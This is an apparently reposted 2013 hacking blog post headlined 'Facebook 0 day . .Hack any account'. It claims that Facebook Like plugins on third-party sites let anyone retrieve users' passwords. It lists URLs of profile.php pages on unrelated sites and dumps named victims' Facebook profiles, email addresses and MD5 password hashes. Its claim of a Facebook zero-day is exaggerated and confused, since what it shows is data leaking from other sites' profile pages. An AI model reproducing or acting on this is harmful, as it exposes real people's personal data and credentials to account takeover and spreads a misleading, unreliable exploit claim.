Facebook 0 day . .Hack any account:--

########################################################################
# Title: Exploit Facebook Via External Plugins and Modules
# Exploitation: Manually (use your brain ^_^)
# Date:  28/03/2013
# Greetz: Milan Patel , Pro R0ot , Th3 Destroy3r , & all Haxor
# Author: Mauritania Attacker
#########################################################################
 






For Example my victim is =======>>>  https://www.facebook.com/gaturro22  

How i could be able to retrieve his password ? easy


Proof of Concept : Facebook Id ====>>> gaturro22


P0C : ======>>> http://www.poringapic.com/profile.php?id=gaturro22


So as you can see we got the email & the password :

email: gonza.la22@gmail.com

password: e10adc3949ba59abbe56e057f20f883e

Another Demo : http://www.salondaddy.com/profile.php?ID=85


So when i try the same method with my profile for example : http://www.poringapic.com/profile.php?id=mauritanie.forever

It says "Invalid profile link followed!" loool because i didn't clicked on the Like Button so an advice becareful don't like external pages on websites they are

backdoored with a javascript malware that can sniff all your informations ^_^

So for example the ID "profile.php" is infected with "Code Disclosure Path" as you can see most of websites nowadays they use plugins of facebook on their websites

especially applications , so the facebook user must allow permission to access to the application and most of the plugins are infected !_!

So if you see that a website has the Like Plugin or use a facebook app you can surely get the passwords of the users ^_^ no doubt , just use your brain !

Another Example : http://www.rosexconect.net/profile.php?ID=15370&shPhotosMode=top

Check this :  [NickName] => orso44  ===========>>> add this to www.facebook.com

http://www.facebook.com/orso44   ============>>> Facebook Profile

[Password] => 5c4e79dd006fb00a07945801234d0dd5 ===========>>> Password Hashed in Md5


Another Victim :  ==========>>> https://www.facebook.com/kornberg

Infos Retrieved :

                    [_iProfileID] => 7893
                    [_aProfile] => Array
                        (
                            [datafile] => 1
                            [ID] => 7893
                            [NickName] => Kornberg
                            [Email] => anselmpennell435@yahoo.com
                            [Password] => 087fbfdeb33dae28260cfdb8f2d8a787
                            [Status] => Active
                            {
                            "id": "862420463",
                            "name": "Zoe Kornberg",
                            "first_name": "Zoe",
                            "last_name": "Kornberg",
                            "username": "kornberg",
                            "gender": "female",
                            "locale": "en_US"
                            }

Proof Of Concept : http://hollywoodfilmshoot.com/profile.php?ID=7893&sh_photoMode=rand

I just selected  this user randomly from Facebook and i remarked that she clicked on Like Button and she has been a victim °_° !!!!!!!
Share on Google Plus

About Unknown

This is a short description in the author block about the author. You edit it by entering text in the "Biographical Info" field in the user admin panel.
    Blogger Comment
    Facebook Comment

0 comments:

Post a Comment